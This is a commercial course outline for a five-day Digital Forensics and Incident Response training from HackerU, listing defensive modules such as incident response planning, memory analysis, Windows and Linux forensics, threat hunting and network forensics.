Course Outline
The 5-day Digital Forensics & Incident Response course introduces participants to DFIR concepts and transfers goal-oriented use techniques. Participants will learn how to investigate an incident, how to gather supportive forensic data, and how to handle it. This course features hands-on simulations provided by @Cywar – a gamified training and assessment platform by HackerU Solutions.
Upcoming Meetings
There are no upcoming meetings for this course. Contact us to schedule this course, which will be customized specifically for your organization.
info@hackerupro.comModules
Introduction to DFIR
- Introduction to DFIR
- DF vs IR vs TH
- Incident Response planning
- Targeted artifacts
- DFIR use-cases
- DFIR Toolset
- SANS & NIST
Incident Response - Preparation
- Defining assets & values
- CIA
- Risk management
- Roles & Responsibilities
- 4 & 6 stages of IR
- Creating IR Plan
- DRP & BCP
- GRC
- ATT&CK
- Compliances – ISO, GDPR, HIPPA, PCI-DSS
Incident Response - Response
- SOC Operation & Lifecycle
- Identification & Scoping
- Containment
- Intelligence gathering
- Eradication
- Chain of custody
Data Acquisition
- Dead System Analysis
- Live System Analysis
- Drive Cloning
- Image Mounting
- Memory Dumping
- Evidence Documentation
Live Forensics
- Artifacts on a Windows computer
- Browser History
- USB History
- DNS Cache
- Prefetch
- MRU
- Nirsoft
Windows Forensics
- Windows DF Specifics
- NTFS
- ADS & MFT
- File Carving
- Registry Forensics
- Forensics using powershell
Memory Analysis
- Memory structure
- Memory analysis tools
- Volatility Breakdown & Usage
- Process exploration
- DLL inspection
- Acquiring memory artifacts
Linux Forensics
- Linux Filesystems
- Network configuration
- Login information
- Bash history
- Identifying Persistence
- Logfile Analysis
File Upload
- Windows EventLog
- PowerShell logs
- Timeline analysis
- DF Timeline
- Log2timeline
Threat Hunting – consider moving after Malware
- Threat Hunting
- Threat intelligence
- Collecting IoCs
- Malware characteristics
- from DF to TH
- Common Hiding Mechanisms
Network Forensics
- Traffic interception & Network Evidence
- Reverse Proxy
- Wireshark
- DF using Wireshark
- Common Protocol Analysis
- Zeek NSM
DFIR Simulation
- DF lab & Recap
Prerequisites
- Hands-on experience with Linux and Windows systems
- A solid understanding of networking infrastructure
Upcoming Meetings
There are no upcoming meetings for this course. Contact us to schedule this course customized for your organization in a group format.
info@hackerupro.comParticipants will learn how to investigate an incident, how to gather supportive forensic data, and how to handle it.”Download Full Syllabus